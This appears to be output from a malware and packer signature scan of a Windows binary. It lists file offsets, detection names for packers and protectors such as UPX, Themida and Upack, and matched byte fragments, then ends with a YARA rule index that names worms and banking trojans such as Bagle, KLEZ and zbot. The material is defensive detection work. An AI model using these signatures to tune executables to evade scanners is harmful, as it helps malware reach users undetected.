0 0x163ec2 Themida_1_0_x_x_1_8_x_x_no_compression_Detecton_Number_2 U`ZEE@E؁}؀tEECEaEU|`ZE]Dž||ÈA||uDž|u7TxЊKuGF|A|uaUuEEF>uu} E None $1
1 0x1560ce 0x181e04 Themida_1_2_0_1_Detecton_1 ŋ`]5 5 5 5 5 t  D$$5 jEhth% None $1
0 0x181e04 Themida_1_2_0_1_Detecton_Number_2 ŋ`]5 5 5 5 5 t  D$$5 jEhth%K  None $1
0 0x155199 Themida_WinLicense_V1_X_NoCompression_SecureEngine_Detecton_1 ŋ`]t  D$$jEhth%K None $1
1 0x1699bb 0x169a10 Thinstall_2_403_Detecton_1 j P@L$)@ IH@D$A )@AA None $1
0 0x152fdd TPPpack_Detecton_1 ]@`3 None $1
0 0x1724be TPPpack_Detecton_1 ]@`3 None $1
1 0x16a0df 0x192040 Trainer_Creation_Kit_5_Trainer_Detecton_1 jhjjjh@h%E@<Pjh@E@hh0@PTXPj.pE@h%E@+0E@ None $1
0 0x192040 Trainer_Creation_Kit_v5_Trainer_Detecton_1 jhjjjh@h%E@<Pjh@E@hh0@PTXPj.pE@h%E@+0E@h4E@Pj50E@PjMtE@jh@jj5pE@ t5tE@'t t50E@t th%E@tjUVQWE =j5pE@Pjh None $1
0 0x178fbb Trilobyte_s_JPEG_graphics_Library_Detecton_1   None $1
0 0x175537 TrueType_Font_file_Detecton_1 LTSH None $1
0 0x175527 TrueType_Font_file_Detecton_Number_2 OS/2 None $1
0 0x18713e Turbo_Pascal_Configuration_File_Detecton_1 Turbo Pascal Configuration None $1
0 0x17b99e Turbo_Pascal_Desktop_File_Detecton_1 Turbo Pascal Desktop None $1
0 0x17e4df Turbo_Pascal_Help_File_Detecton_1 TURPASHELP None $1
0 0x185e9d Turbo_Profiler_Areas_file_Detecton_1 TurboProfilerareasfile None $1
0 0x1623e8 Unnamed_Scrambler_1_0_Detecton_Number_2 USV3E@0k@3UhB@d0d B@ظ(k@7,k@+(k@ЋËBB@*ظ k@$k@ k@ЋËjjjj2(k@YUU$k@ k@jjjj2 None $1
0 0x15456d Unnamed_Scrambler_1_1C_Detecton_Number_2 USV3EEEGO\g3UhJd0d Jg_؋֋Ë g:FPиg[g ЍFNPFHиggЋƋNHv\vXvdv`gggvg\иgظg None $1
0 0x15f3a9 Unnamed_Scrambler_1_2B_Detecton_Number_2 USVW3E؉E܉EEEp:@3Uh\?@d0d \ e@3ɺhh e@jU@l?@U@ZU@ U@a@иTb@Tb@иU@ a@54b@50b@5<b@58b@U衈a@U None $1
0 0x16d9c3 Unnamed_Scrambler_1_2C_1_2D_Detecton_Number_2 UjjIuQSVW:3Uhd0d 3ɺhh j иTTи 54505<58U衈UT None $1
0 0x16cdb5 Unnamed_Scrambler_2_0_Detecton_Number_2 U jjIuSVW /@3Uh3@d0d 4@T@؅ujZT@Ë T@t k@ i@ET@E1W@EC`@j@j@{u ;и k@ k@oЋE jj jj, k@%UUk@ k@ None $1
0 0x156b0e Unnamed_Scrambler_2_1_Beta_2_1_1_Detecton_Number_2 UjjIuSVW:3UhCd0d Cd؅ujdË d3EdEEh{u ;иЋE None $1
0 0x165360 Unnamed_Scrambler_2_5A_Detecton_Number_2 U jjIuQSVWl>@3Uh`D@d0d pD@l@b؅ujd@Ë l@7l@ hl@l@d@l@;t3׋ ;l@l@$Ћǣ n@U3 E n@n@ None $1
1 0x159ae8 0x175c1d UPack_0_11_Detecton_1 H@33ɫHر PQXT\rZ,s<r,P_ [ g) None $1
1 0x15e255 0x15e26f Upack_0_22_0_23_beta_Detecton_Number_3 j@Y󥭵PQXT None $1
1 0x1547cb 0x18aaff Upack_0_28_0_399_relocated_image_base_Delphi_NET_DLL_or_something_else_Detecton_1 ` 3^+ޭ+حP^V n]} ^SPQXT\rW,s<r None $1
0 0x1798ec Upack_0_28_0_399_relocated_image_base_Delphi_NET_DLL_or_something_else_Detecton_1 ` 3^+ޭ+حP^V n]} ^SPQXT\rW,s<r None $1
1 0x154694 0x1546b2 Upack_0_36_beta_Detecton_1 6H KERNEL32.DLL None $1
1 0x16e87f 0x16e8d3 Upack_0_37_beta_Detecton_1 Pv4|H LoadLibraryA7 None $1
1 0x16061b 0x16066f Upack_0_38_beta_Detecton_1 Pv4|H LoadLibraryA8 None $1
1 0x16685c 0x1668b0 Upack_0_399_Detecton_1 Pv4|H LoadLibraryA: None $1
0 0x175c1d UPack_v0_11_Detecton_1 H@33ɫHر PQXT\rZ,s<r,P_ [ g)+V *3҄RƊЍZtt3ɵU3^ 0sP0r0r+< r P+F σ`Շ^s 0Շ^s^<r PS|U[w<r P^^^ UPH None $1
0 0x163a7a Upack_v0_29_Beta_v0_31_Beta_Detecton_1 󥭵 None $1
0 0x16591c Upack_v0_29_Beta_v0_31_Beta_Detecton_1 @󥭵 None $1
0 0x162d9c Upack_v0_32_Beta_Patch_Detecton_1 P None $1
0 0x15326e Upack_v0_32_Beta_Detecton_1 P None $1
0 0x15327b Upack_v0_32_Beta_Detecton_Number_2 P None $1
0 0x16a375 Upack_v0_35_alpha_Detecton_1 L T None $1
0 0x157869 Upack_v0_36_alpha_Detecton_1 ]YvhQYF None $1
2 0x159754 0x16074f 0x16e9b3 Upack_v0_37_v0_38_Beta_Strip_base_relocation_table_Option_Detecton_1 S3U@QVL3 None $1
4 0x1627cf 0x166988 0x1779b8 0x17bdda 0x188bcd Upack_v0_39_final_Detecton_Number_2 VS3U@Q None $1
6 0x1606f7 0x166819 0x166938 0x16e95b 0x177968 0x17bd8a 0x188b7d Upack_v0_39_final_Detecton_Number_3 v8P>j'Yv None $1
0 0x17602d Upack_Patch_Detecton_Number_2 *T None $1
0 0x17ea29 UPolyX_V0_1_Detecton_1 None $1
1 0x15c7e0 0x18ed4d UPolyX_v0_5_Detecton_1 $Y None $1
0 0x18478a UPolyX_v0_5_Detecton_1 $Y None $1
1 0x15c834 0x176f67 UPolyX_v0_5_Detecton_Number_2 F $3 None $1
0 0x176f67 UPolyX_v0_5_Detecton_Number_3 F $3 None $1
1 0x163d01 0x17ee52 UPX_Detecton_1 `Bp None $1
0 0x164f06 UPX_Detecton_1 `A None $1
0 0x166a10 UPX_Detecton_1 `Fp None $1
1 0x168079 0x168097 UPX_Detecton_1 `@ None $1
0 0x1680ec UPX_Detecton_1 `@ None $1
1 0x16897d 0x176547 UPX_Detecton_1 `B` None $1
0 0x16aa2f UPX_Detecton_1 `@ None $1
0 0x1727fa UPX_Detecton_1 `D` None $1
0 0x1836dc UPX_Detecton_1 `C None $1
0 0x18372c UPX_Detecton_1 `Cp None $1
0 0x19583f UPX_Detecton_1 `PC None $1
0 0x195bd5 UPX_Detecton_1 `@ None $1
1 0x163d01 0x17ee52 UPX_Detecton_Number_2 `Bp None $1
0 0x164f06 UPX_Detecton_Number_2 `A None $1
0 0x166a10 UPX_Detecton_Number_2 `Fp None $1
1 0x168079 0x168097 UPX_Detecton_Number_2 `@ None $1
0 0x1680ec UPX_Detecton_Number_2 `@ None $1
1 0x16897d 0x176547 UPX_Detecton_Number_2 `B` None $1
0 0x16aa2f UPX_Detecton_Number_2 `@ None $1
0 0x16e040 UPX_Detecton_Number_2 ` None $1
3 0x1710ab 0x17c6cc 0x17fca2 0x18d2da UPX_Detecton_Number_2 ` None $1
0 0x1727fa UPX_Detecton_Number_2 `D` None $1
0 0x175f5a UPX_Detecton_Number_2 ` None $1
0 0x180839 UPX_Detecton_Number_2 ` None $1
0 0x1836dc UPX_Detecton_Number_2 `C None $1
0 0x18372c UPX_Detecton_Number_2 `Cp None $1
0 0x184e98 UPX_Detecton_Number_2 `R None $1
0 0x18cfcf UPX_Detecton_Number_2 `+ None $1
0 0x18d026 UPX_Detecton_Number_2 `' None $1
0 0x191bc1 UPX_Detecton_Number_2 `P None $1
0 0x19583f UPX_Detecton_Number_2 `PC None $1
0 0x195bd5 UPX_Detecton_Number_2 `@ None $1
0 0x15f29b UPX_2_00_3_0X_Detecton_1 ^G,<w?u_f)ٍ t<_P None $1
0 0x15f29b UPX_2_00_3_0X_Detecton_Number_2 ^G,<w?u_f)ٍ t<_PGt܉WHU tPTjSWՍ `(XPTPSWXaD$j9u None $1
1 0x163506 0x1840d4 UPX_Inliner_1_0_Detecton_1 `]@-@+荵tՋ+Љ None $1
0 0x1840d4 UPX_Inliner_v1_0_Detecton_1 `]@-@+荵tՋ+Љ6`j@hhj[1@.@PS=a߃?u ;;t-3{WQRS VW[ZY_thj None $1
0 0x15ed4b UPX_Protector_v1_0x_2_Detecton_1 FGu  None $1
7 0x163756 0x168997 0x16e845 0x174a26 0x176561 0x1836f6 0x183746 0x1897c1 UPX_Protector_v1_0x_2_Detecton_1 FGu  None $1
0 0x1753a0 UPX_Protector_v1_0x_2_Detecton_1 FGu  None $1
0 0x167b41 UPX_V1_94_Detecton_1 ՀXPTPSWXaD$j9u None $1
1 0x1540b5 0x178d8b UPX_v2_0_Detecton_1 U tPTjSWՍ `(XPTPSWXaD$j9u None $1
0 0x178d8b UPX_v2_0_Detecton_Number_2 U tPTjSWՍ `(XPTPSWXaD$j9u None $1
0 0x158149 UPX_V2_00_V2_90_Detecton_1 Ս `XPTPSWXaD$j9u None $1
1 0x15f32e 0x178dba UPX_V2_00_V2_90_Detecton_1 Ս `(XPTPSWXaD$j9u None $1
0 0x162510 UPX_HiT_0_0_1_Detecton_1 a None $1
0 0x1555bd UPX_HiT_v0_0_1_Detecton_1 4 a None $1
0 0x190e9b UPX_HiT_v0_0_1_Detecton_1 C4 a None $1
0 0x173ab1 UPX_Scrambler_Detecton_1 fu None $1
1 0x159282 0x1592d7 UPXFreak_0_1_Borland_Delphi_Detecton_1 OEOEBV$ None $1
0 0x18e9d7 USSR_V0_31_Detecton_1 @.USSR@ None $1
1 0x1732e0 0x18e9d7 USSR_V0_31_Detecton_Number_2 @.USSR None $1
0 0x17b15e Utah_RLE_Graphics_format_Detecton_1 R  None $1
0 0x18dea1 VBOX_v4_3_v4_6_Detecton_1 ċċċċċċċċċċċċċċċ None $1
0 0x16e7e7 VBOX_v4_3_v4_6_Detecton_Number_2 ŋŋŋŋŋŋŋŋŋŋŋŋŋŋŋ None $1
0 0x16e803 VBOX_v4_3_v4_6_Detecton_Number_3 ŋŐ33+3ŋ+H @ None $1
0 0x18de7a VBOX_v4_3_v4_6_Detecton_Number_3 33+3ŋ+H @ None $1
0 0x17d761 Video_CD_file_Detecton_1 RIFFCDXAfmt None $1
1 0x16ccb3 0x18dbfb VIRUS_I_Worm_Bagle_Detecton_1 j=P@uhȯP@h\W@h0@5P@:=TW@th None $1
0 0x18dbfb VIRUS_I_Worm_Bagle_Detecton_Number_2 j=P@uhȯP@h\W@h0@5P@:=TW@th%@@%@@%@@%@@%@@%@@%@@%@@%$@@%(@@%,@@%0@@%4@@%8@@%<@@%@@@%D@@%H@@%L@@%P@@%T@@%X@@%\@@%`@@%@@%d@@%h@@ None $1
0 0x15545f VIRUS_I_Worm_Hybris_Detecton_1 TGABLKCGCRIShLp@ None $1
0 0x15be14 VIRUS_I_Worm_KLEZ_Detecton_1 Ujh@@h@dPd%XSVWe None $1
0 0x16afec VMProtect_0_7x_0_8_Detecton_1 [ VMProtect v 0.8 (C) PolyTech ] None $1
0 0x1737ef VMProtect_v1_25_Detecton_Number_829 EffEEfUf None $1
0 0x164f18 VMProtect_V1_X_Detecton_1 `ht$(4$ None $1
0 0x1555d2 VPacker_Detecton_1 EuPEPUSEPU؃ENuċ>uE@E܋U hjEPUU܋B<E܃؃EPj@hRUC` None $1
1 0x1584f6 0x158647 VProtector_Detecton_1 KERNEL32.dllUSER32.dllGDI32.dllGetProcAddressGetModuleHandleALo None $1
1 0x1584f6 0x158647 VProtector_Detecton_Number_3 KERNEL32.dllUSER32.dllGDI32.dllGetProcAddressGetModuleHandleALoadLibraryASleepGetVersionGetCommandLineAGetStartupInfoAGetACPCreateThreadDefWindowProcARegisterClassExACreateWindowExAGetSystemMetricsShowWindowGetDCReleaseDCFindWindowAGetMessageADestroyWindowSetPixel None $1
1 0x1584f6 0x158647 VProtector_Detecton_Number_4 KERNEL32.dllUSER32.dllGDI32.dllGetProcAddressGetModuleHandleALoadLibraryASleepGetVersionGetCommandLineAGetStartupInfoAGetACPCreateThreadDefWindowProcARegisterClassExACreateWindowExAGetSystemMetricsShowWindowGetDCReleaseDCFindWindowAGetMessageADestroyWindowSetPixel None $1
0 0x15879c VProtector_Detecton_Number_5 User32.dllGdi32.dllKernel32.dllDefWindowProcARegisterClassExACreateWindowExAGetSystemMetricsShowWindowGetDCReleaseDCFindWindowAGetMessageA None $1
0 0x15b876 VProtector_0_X_1_2X_Detecton_1 VirtualAllocvcasm_protect_3d$dXǃd5d% 1 3 YtuQX %Iuǃ X P None $1
0 0x16f865 VProtector_1_1A_1_2_Detecton_1 VirtualAllocvcasm_protect_2005_3_183d$dXǃd5d% 1 3 YtuQX %Iuǃ X P None $1
1 0x15f618 0x1627e6 vprotector_1_2_Detecton_Number_2 [VProtect]$D$=ud$X dtu$d5tu $d% None $1
0 0x15ee18 VProtector_1_3X_Detecton_1 kernel32.dllGetProcAddressGetModuleHandleALoadLibraryA`$$$(€3ۤ3-37A} None $1
0 0x15879c VProtector_V1_3X_Detecton_1 User32.dllGdi32.dllKernel32.dll None $1
0 0x17e3ea Watcom_C_C_Detecton_1 @WATCOM C/C++32 Run-Time system. (c) Copyright by WATCOM International Corp. None $1
0 0x16b036 Werus_Crypter_1_0_Detecton_Number_2 h@jPj %@%@%@%@%@%@%@%@%@%@ None $1
0 0x16b036 Werus_Crypter_1_0_Detecton_Number_3 h@jPj %@%@%@%@%@%@%@%@%@%@%@%@@3} None $1
0 0x190774 Windows_Animation_format_Detecton_1 RIFFACONLIST None $1
0 0x180762 Windows_Type_1_font_metric_file_Detecton_1 Copyright None $1
1 0x15aae9 0x18509c WinKript_1_0_Detecton_1 3t3P 949A;rXa None $1
5 0x15520f 0x155223 0x15fa48 0x15fca0 0x15fda6 0x16cd08 WinUpack_v0_30_beta_Detecton_1 ByDwing@PE None $1
4 0x155223 0x15fa48 0x15fca0 0x15fda6 0x16cd08 WinUpack_v0_30_beta_Detecton_Number_2 ByDwing@PEL None $1
3 0x15f355 0x1778e0 0x17bd02 0x188af5 WinUpack_v0_39_final_Detecton_Number_4 Pv4|H LoadLibraryA9 None $1
1 0x166e7f 0x189b76 Wise_Installer_Stub_1_10_1029_1_Detecton_1 U@SVWj0@t0@E"uHH@E3t"t H@E8"u@E8 u @8 tE None $1
1 0x1533a4 0x18b818 Wise_Installer_Stub_Detecton_Number_3 USVWj^ju@@@@}<"GG}3:t <"t GG}?"uG}? None $1
0 0x1750ac Wise_Installer_Stub_Detecton_Number_3 U,SVWj^juT@@P@@}<"GG}3:t <"t GG}?"uG}? None $1
0 0x18b818 Wise_Installer_Stub_Detecton_Number_4 USVWj^ju@@@@}<"GG}3:t <"t GG}?"uG}? u G? t}S@@?/EuG<St<su5 None $1
0 0x1651d6 X_Hider_1_0_Detecton_Number_2 t#JAPRB0XRHHZXBtJI| JuB\Í@~$P P/ZfDZP@1Ð None $1
0 0x158908 X_Pack_v1_4_2_Detecton_1 rËރÎ؋߃Î None $1
0 0x1722e6 XCF_File_Format_Detecton_1 FrameLen None $1
0 0x14ad80 XM_music_file_Detecton_1 Extended Module: None $1
0 0x179b51 XMI_music_file_Detecton_1 FORMXMID None $1
2 0x15df84 0x187794 0x19352f Xtreme_Protector_1_06_Detecton_1 uPQJ`t$$|$(FGuFsuFsO3uF None $1
0 0x17f88e XWD_graphics_format_Detecton_1 q None $1
1 0x15e9a9 0x191b12 yC_1_3_Detecton_1 USVW@0`]RAu^ARAՁRA:3¬ None $1
1 0x1568fd 0x187176 yoda_s_Protector_1_01_Detecton_1 USVWy-` None $1
8 0x1603d6 0x1646d6 0x16e218 0x1761f5 0x1814cc 0x1872b9 0x18743d 0x18f583 0x1930aa yoda_s_Protector_1_02_exe_scr_com_Detecton_1 UUu None $1
2 0x153b7e 0x17adbf 0x191124 yoda_s_Protector_1_0b_Detecton_1 USVW`]L2@G@2@Ձ2@:3 None $1
1 0x16262b 0x18fd6f yoda_s_Protector_1_0b_Detecton_1 USVW`]L2@G@2@Ձ2@:3 None $1
4 0x153b7e 0x16262b 0x17adbf 0x18fd6f 0x191124 yoda_s_Protector_1_0b_Detecton_Number_2 USVW`]L2@ None $1
1 0x1646d6 0x1814cc yoda_s_Protector_v1_03_2_Detecton_1 UUu.`]sBՁsBR None $1
1 0x16262b 0x18fd6f yP_1_0b_Detecton_1 USVW`]L2@G@2@Ձ2@:3 None $1
1 0x15630f 0x184cf1 ZipWorxSecureEXE_2_5_Detecton_1 SecureEXE Executable File Protector Copyright(c) 20 None $1

YARA:TAGS:LIST

namespace rule meta
packers_index possible_includes_base64_packed_functions impact: 5 hide: True desc: Detects possible includes and packed functions
packers_index silent_banker author: malware-lu
packers_index zbot author: malware-lu
packers_index Borland author: malware-lu
packers_index EnigmaProtector1XSukhovVladimirSergeNMarkin author: malware-lu
packers_index SPLayerv008 author: malware-lu
packers_index eXPressorv13CGSoftLabs author: malware-lu
packers_index Upackv032BetaDwing author: malware-lu
packers_index WiseInstallerStub author: malware-lu
packers_index AnskyaNTPackerGeneratorAnskya author: malware-lu
packers_index NsPack14byNorthStarLiuXingPing author: malware-lu
packers_index EmbedPEV100V124cyclotron author: malware-lu
packers_index SetupFactoryv6003SetupLauncher author: malware-lu
packers_index IMPPacker10MahdiHezavehiIMPOSTER author: malware-lu
packers_index PEProtectv09 author: malware-lu
packers_index UPXv20MarkusLaszloReiser author: malware-lu
packers_index PECompactv200alpha38 author: malware-lu
packers_index FreeCryptor01build001GlOFF author: malware-lu
packers_index UnnamedScrambler11Cp0ke author: malware-lu
packers_index PAVCryptorPawningAntiVirusCryptormasha_dev author: malware-lu
packers_index EncryptPEV22006115WFS author: malware-lu
packers_index PrincessSandyv10eMiNENCEProcessPatcherPatch author: malware-lu
packers_index ocBat2Exe10OC author: malware-lu
packers_index ASDPack20asd author: malware-lu
packers_index EXECryptor2021protectedIAT author: malware-lu
packers_index ThemidaWinLicenseV1XNoCompressionSecureEngineOreansTechnologies author: malware-lu
packers_index WinUpackv030betaByDwing author: malware-lu
packers_index ExeSafeguardv10simonzh author: malware-lu
packers_index PrivateEXEProtector20SetiSoft author: malware-lu
packers_index NTkrnlSecureSuite01015DLLNTkrnlSoftware author: malware-lu
packers_index UPXHiTv001DJSiba author: malware-lu
packers_index Vpackerttui author: malware-lu
packers_index eXPressorv12CGSoftLabs author: malware-lu
packers_index Enigmaprotector110111VladimirSukhov author: malware-lu
packers_index Obsidium1336ObsidiumSoftware author: malware-lu
packers_index MarjinZEXEScramblerSEbyMarjinZ author: malware-lu
packers_index Packman0001Bubbasoft author: malware-lu
packers_index aPackv098bDSESnotsaved author: malware-lu
packers_index ASProtectvIfyouknowthisversionpostonPEiDboardh2 author: malware-lu
packers_index AntiDote12DLLDemoSISTeam author: malware-lu
packers_index Themida1201OreansTechnologies author: malware-lu
packers_index ASProtectSKE21xexeAlexeySolodovnikov author: malware-lu
packers_index EXECryptorV21Xsoftcompletecom author: malware-lu
packers_index RCryptorv11Vaska author: malware-lu
packers_index nSpackV2xLiuXingPing author: malware-lu
packers_index MetrowerksCodeWarriorv20GUI author: malware-lu
packers_index UnnamedScrambler21Beta211p0ke author: malware-lu
packers_index NoodleCryptv20 author: malware-lu
packers_index BlindSpot10s134k author: malware-lu
packers_index DropperCreatorV01Conflict author: malware-lu
packers_index dUP2xPatcherwwwdiablo2oo2cjbnet author: malware-lu
packers_index EXECryptor2223compressedcodewwwstrongbitcom author: malware-lu
packers_index PolyCryptPE214b215JLabSoftwareCreationshoep author: malware-lu
packers_index MetrowerksCodeWarriorv20Console author: malware-lu
packers_index Upackv036alphaDwing author: malware-lu
packers_index NETDLLMicrosoft author: malware-lu
packers_index CelsiusCrypt21Z3r0 author: malware-lu
packers_index CreateInstallv200335 author: malware-lu
packers_index UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser author: malware-lu
packers_index Petite21 author: malware-lu
packers_index VProtectorvcasm author: malware-lu
packers_index XPackv142 author: malware-lu
packers_index ExeSplitter13SplitCryptMethodBillPrisonerTPOC author: malware-lu
packers_index EXECryptor224StrongbitSoftCompleteDevelopmenth3 author: malware-lu
packers_index ASProtectv12AlexeySolodovnikovh1 author: malware-lu
packers_index LY_WGKXwwwszleyucom author: malware-lu
packers_index Enigmaprotector110unregistered author: malware-lu
packers_index Upackv037v038BetaStripbaserelocationtableOptionDwing author: malware-lu
packers_index NTkrnlSecureSuiteNTkrnlteam author: malware-lu
packers_index AaseCrypterbysantasdad author: malware-lu
packers_index aPackv098bJibz author: malware-lu
packers_index UPackv011Dwing author: malware-lu
packers_index NsPacKNetLiuXingPing author: malware-lu
packers_index RLPv073betaap0x author: malware-lu
packers_index MetrowerksCodeWarriorDLLv20 author: malware-lu
packers_index PESpinv04x author: malware-lu
packers_index D1NS1GD1N author: malware-lu
packers_index MoleBoxv230Teggo author: malware-lu
packers_index Petite14 author: malware-lu
packers_index Petite13 author: malware-lu
packers_index RosAsm2050aBetov author: malware-lu
packers_index ACProtect14xRISCOsoft author: malware-lu
packers_index PEZipv10byBaGIE author: malware-lu
packers_index NsPackV2XLiuXingPing author: malware-lu
packers_index KBysPacker028BetaShoooo author: malware-lu
packers_index AntiDote12DemoSISTeam author: malware-lu
packers_index VProtector0X12Xvcasm author: malware-lu
packers_index VIRUSIWormKLEZ author: malware-lu
packers_index OpenSourceCodeCrypterp0ke author: malware-lu
packers_index QrYPt0rbyNuTraL author: malware-lu
packers_index EXECryptor2xxmaxcompressedresources author: malware-lu
packers_index MSLRHv032aemadicius author: malware-lu
packers_index EXECryptor2xxcompressedresources author: malware-lu
packers_index PolyBoxCAnskya author: malware-lu
packers_index UPolyXv05 author: malware-lu
packers_index PrivatePersonalPackerPPP102ConquestOfTroycom author: malware-lu
packers_index ENIGMAProtectorSukhovVladimir author: malware-lu
packers_index PuNkMoD1xPuNkDuDe author: malware-lu
packers_index InnoSetupModulev2018 author: malware-lu
packers_index AntiDote10Demo12SISTeam author: malware-lu
packers_index nSpackV23LiuXingPing author: malware-lu
packers_index NsPackv23NorthStar author: malware-lu
packers_index NTkrnlSecureSuite01015NTkrnlSoftware author: malware-lu
packers_index CrunchPEv40 author: malware-lu
packers_index hmimysProtectv10 author: malware-lu
packers_index PEPaCKv10CCopyright1998byANAKiN author: malware-lu
packers_index Upack022023betaDwing author: malware-lu
packers_index kkrunchyv017FGiesen author: malware-lu
packers_index ACProtectUltraProtect10X20XRiSco author: malware-lu
packers_index RLPV073betaap0x author: malware-lu
packers_index yCv13byAshkbizDanehkar author: malware-lu
packers_index PerlApp602ActiveState author: malware-lu
packers_index UPXProtectorv10x2 author: malware-lu
packers_index CodeVirtualizer1310OreansTechnologies author: malware-lu
packers_index VProtector13Xvcasm author: malware-lu
packers_index PEQuake006forgat author: malware-lu
packers_index D1S1Gv11BetaScrambledEXED1N author: malware-lu
packers_index UPX20030XMarkusOberhumerLaszloMolnarJohnReiser author: malware-lu
packers_index UnnamedScrambler12Bp0ke author: malware-lu
packers_index LauncherGeneratorv103 author: malware-lu
packers_index NakedPacker10byBigBoote author: malware-lu
packers_index ActiveMARK5xTrymediaSystemsInc author: malware-lu
packers_index AsCryptv01SToRM2 author: malware-lu
packers_index AsCryptv01SToRM3 author: malware-lu
packers_index AsCryptv01SToRM4 author: malware-lu
packers_index PackItBitch10archphase author: malware-lu
packers_index SafeDiscv4 author: malware-lu
packers_index EXECryptorv153 author: malware-lu
packers_index Crunch5Fusion4 author: malware-lu
packers_index NorthStarPEShrinkerv13byLiuxingping author: malware-lu
packers_index Armadillo430aSiliconRealmsToolworks author: malware-lu
packers_index STProtectorV15SilentSoftware author: malware-lu
packers_index ANDpakk2006DmitryAndreev author: malware-lu
packers_index NETexecutableMicrosoft author: malware-lu
packers_index AZProtect0001byAlexZakaAZCRC author: malware-lu
packers_index ExeSplitter12BillPrisonerTPOC author: malware-lu
packers_index Morphinev27Holy_FatherRatter29A author: malware-lu
packers_index EnigmaProtector11X13XSukhovVladimirSergeNMarkin author: malware-lu
packers_index AsCryptv01SToRM1 author: malware-lu
packers_index MaskPE16yzkzero author: malware-lu
packers_index ASProtectv20 author: malware-lu
packers_index UnnamedScrambler10p0ke author: malware-lu
packers_index UPXHiT001DJSiba author: malware-lu
packers_index yPv10bbyAshkbizDanehkar author: malware-lu
packers_index MSLRHv031a author: malware-lu
packers_index Upackv039finalDwing author: malware-lu
packers_index FakeNinjav28Spirit author: malware-lu
packers_index DragonArmorOrient author: malware-lu
packers_index Upackv032BetaPatchDwing author: malware-lu
packers_index Apex30alpha500mhz author: malware-lu
packers_index ExeSplitter13SplitMethodBillPrisonerTPOC author: malware-lu
packers_index RJoiner12aVaska author: malware-lu
packers_index UPXInlinerv10byGPcH author: malware-lu
packers_index SLVc0deProtector060SLVICU author: malware-lu
packers_index Upackv029Betav031BetaDwing author: malware-lu
packers_index AlexProtector10beta2byAlex author: malware-lu
packers_index MoleBoxv254Teggo author: malware-lu
packers_index Themida10xx18xxnocompressionOreansTechnologies author: malware-lu
packers_index PolyBoxDAnskya author: malware-lu
packers_index nBinderv40 author: malware-lu
packers_index SimplePack12build3009Method2bagie author: malware-lu
packers_index RSCsProcessPatcherv151 author: malware-lu
packers_index VMProtect106107PolyTech author: malware-lu
packers_index USSR031bySpirit author: malware-lu
packers_index ASProtectv123RC4build0807exeAlexeySolodovnikov author: malware-lu
packers_index eXPressorProtection150XCGSoftLabs author: malware-lu
packers_index XHider10GlobaL author: malware-lu
packers_index UnnamedScrambler25Ap0ke author: malware-lu
packers_index InnoSetupModule author: malware-lu
packers_index FreeCryptor01build002GlOFF author: malware-lu
packers_index NTPackerV2XErazerZ author: malware-lu
packers_index SiliconRealmsInstallStub author: malware-lu
packers_index MoleBoxv20 author: malware-lu
packers_index AI1Creator1Beta2byMZ author: malware-lu
packers_index Setup2GoInstallerStub author: malware-lu
packers_index mkfpackllydd author: malware-lu
packers_index PrivateexeProtectorV18SetiSoftTeam author: malware-lu
packers_index DotFixNiceProtect21GPcHSoft author: malware-lu
packers_index SimplePackV11XMethod2bagie author: malware-lu
packers_index NullsoftInstallSystemv20 author: malware-lu
packers_index SLVc0deProtectorv11SLV author: malware-lu
packers_index PEArmor04600759hying author: malware-lu
packers_index RpolycryptbyVaska2003071841 author: malware-lu
packers_index DevCv4 author: malware-lu
packers_index DevCv5 author: malware-lu
packers_index UnderGroundCrypterbyBooster2000 author: malware-lu
packers_index PrivateEXEProtector18 author: malware-lu
packers_index PolyCryptPE214b215JLabSoftwareCreationshsigned author: malware-lu
packers_index MEW10byNorthfox author: malware-lu
packers_index MaskPEV20yzkzero author: malware-lu
packers_index ChinaProtectdummy author: malware-lu
packers_index MinkeV101Codius author: malware-lu
packers_index ElicenseSystemV4000ViaTechInc author: malware-lu
packers_index PEStubOEPv1x author: malware-lu
packers_index EXECryptor2117StrongbitSoftCompleteDevelopment author: malware-lu
packers_index GHFProtectorpackonlyGPcH author: malware-lu
packers_index UPXV194MarkusOberhumerLaszloMolnarJohnReiser author: malware-lu
packers_index SoftComp1xBGSoftPT author: malware-lu
packers_index PeCompact2253276BitSumTechnologies author: malware-lu
packers_index FlyCrypter10ut1lz author: malware-lu
packers_index RSCsProcessPatcherv14 author: malware-lu
packers_index hmimysPacker10hmimys author: malware-lu
packers_index RLPackV112V114LZMA430ap0x author: malware-lu
packers_index EXECryptorV22Xsoftcompletecom author: malware-lu
packers_index PeStubOEPv1x author: malware-lu
packers_index DEFv10 author: malware-lu
packers_index UnnamedScrambler251Beta2252p0ke author: malware-lu
packers_index PrivateEXEProtector18SetiSoft author: malware-lu
packers_index Safe20 author: malware-lu
packers_index MZ_Crypt10byBrainSt0rm author: malware-lu
packers_index NTKrnlPackerAshkbizDanehkar author: malware-lu
packers_index NME11Publicbyredlime author: malware-lu
packers_index FakeNinjav28AntiDebugSpirit author: malware-lu
packers_index EnigmaProtector10XSukhovVladimir author: malware-lu
packers_index PEProtect09byCristophGabler1998 author: malware-lu
packers_index RCryptorv16dVaska author: malware-lu
packers_index Enigmaprotector112VladimirSukhov author: malware-lu
packers_index PolyEnEV001LennartHedlund author: malware-lu
packers_index TrainerCreationKitv5Trainer author: malware-lu
packers_index EXEStealthv273 author: malware-lu
packers_index EXEStealthv274 author: malware-lu
packers_index ProtectSharewareV11eCompservCMS author: malware-lu
packers_index Upackv035alphaDwing author: malware-lu
packers_index InnoSetupModulev304betav306v307 author: malware-lu
packers_index ASDPackv10asd author: malware-lu
packers_index ORiENV1XV2XFisunAV author: malware-lu
packers_index ARMProtector03bySMoKE author: malware-lu
packers_index DzAPatcherv13Loader author: malware-lu
packers_index NullsoftPiMPInstallSystemv1x author: malware-lu
packers_index EXECryptor2223protectedIAT author: malware-lu
packers_index Morphinev33SilentSoftwareSilentShieldc2005 author: malware-lu
packers_index VMProtect07x08PolyTech author: malware-lu
packers_index WerusCrypter10Kas author: malware-lu
packers_index PEQuakev006byfORGAT author: malware-lu
packers_index Anti007V26LiuXingPing author: malware-lu
packers_index aPackv098m author: malware-lu
packers_index BamBamv001Bedrock author: malware-lu
packers_index EXEStealthv25 author: malware-lu
packers_index Shrinker33 author: malware-lu
packers_index Shrinker32 author: malware-lu
packers_index Shrinker34 author: malware-lu
packers_index eXPressorv120b author: malware-lu
packers_index SCObfuscatorSuperCRacker author: malware-lu
packers_index eXPressorv14CGSoftLabs author: malware-lu
packers_index PUNiSHERV15FEUERRADER author: malware-lu
packers_index nMacrorecorder10 author: malware-lu
packers_index iPBProtectv013 author: malware-lu
